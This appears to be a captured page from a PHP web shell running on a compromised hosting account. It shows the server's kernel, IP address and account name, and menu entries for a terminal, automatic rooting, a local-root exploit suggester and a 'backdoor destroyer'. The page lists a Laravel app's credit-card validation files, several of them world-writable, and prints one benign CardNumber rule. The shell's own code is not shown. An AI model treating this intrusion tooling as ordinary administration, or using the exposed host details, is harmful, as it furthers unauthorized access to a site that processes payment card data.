Linux premium61.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.53 & Your IP : 216.73.216.73
Domains :
Cant Read [ /etc/named.conf ]
User : vdeshvpx
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
vdeshvpx /
adminapi.linkcrow.com /
app /
Rules /
Delete
Unzip
Name
Size
Permission
Date
Action
CardCvc.php
1.08
KB
-rwxrwxrwx
2024-06-30 18:36
CardExpirationMonth.php
1.02
KB
-rwxrwxrwx
2024-06-30 18:36
CardExpirationYear.php
1.01
KB
-rwxrwxrwx
2024-06-30 18:36
CardNumber.php
1.45
KB
-rwxrwxrwx
2024-06-30 18:36
current.php
22
B
-rw-r--r--
2026-04-01 01:39
error_log
2.36
KB
-rw-r--r--
2026-02-09 00:58
Save
Rename
<?php namespace App\Rules; use Illuminate\Contracts\Validation\Rule; use LVR\CreditCard\Exceptions\CreditCardException; use LVR\CreditCard\Exceptions\CreditCardLengthException; use LVR\CreditCard\Exceptions\CreditCardChecksumException; use LVR\CreditCard\Factory; class CardNumber implements Rule { const MSG_CARD_INVALID = 'Invalid Card'; const MSG_CARD_PATTER_INVALID = 'Invalid Pattern'; const MSG_CARD_LENGTH_INVALID = 'Invalid Length'; const MSG_CARD_CHECKSUM_INVALID = 'Invalid Checksum'; protected $message = ''; /** * Determine if the validation rule passes. * * @param string $attribute * @param mixed $value * * @return bool */ public function passes($attribute, $value) { try { return Factory::makeFromNumber($value)->isValidCardNumber(); } catch (CreditCardLengthException $ex) { $this->message = self::MSG_CARD_LENGTH_INVALID; return false; } catch (CreditCardChecksumException $ex) { $this->message = self::MSG_CARD_CHECKSUM_INVALID; return false; } catch (CreditCardException $ex) { $this->message = self::MSG_CARD_INVALID; return false; } } /** * Get the validation error message. * * @return string */ public function message() { return trans($this->message); } }